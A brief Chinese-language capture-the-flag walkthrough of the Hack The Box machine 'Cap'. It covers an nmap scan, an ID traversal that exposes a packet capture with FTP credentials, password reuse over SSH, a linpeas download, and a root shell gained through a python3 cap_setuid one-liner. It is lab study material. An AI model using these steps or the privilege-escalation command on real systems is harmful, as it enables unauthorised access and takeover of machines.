CAP
连上openVPN,扫一下:
1 | nmap -sV -sC -O -T4 10.129.13.189 |
打开网页,发现这里可以遍历ID:

拿到一个流量包,全局搜ftp

拿到账号密码直接登录进去

然后拿到user.txt

尝试密码复用,链接ssh成功。

suid没什么可利用的

尝试下载内网扫描工具或进行一些capabilities的利用。
1 | https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh |

发现能 cap_setuid,直接提权并拿下flag。
1 | nathan@cap:~$ python3 -c 'import os; os.setuid(0); os.system("/bin/bash")' |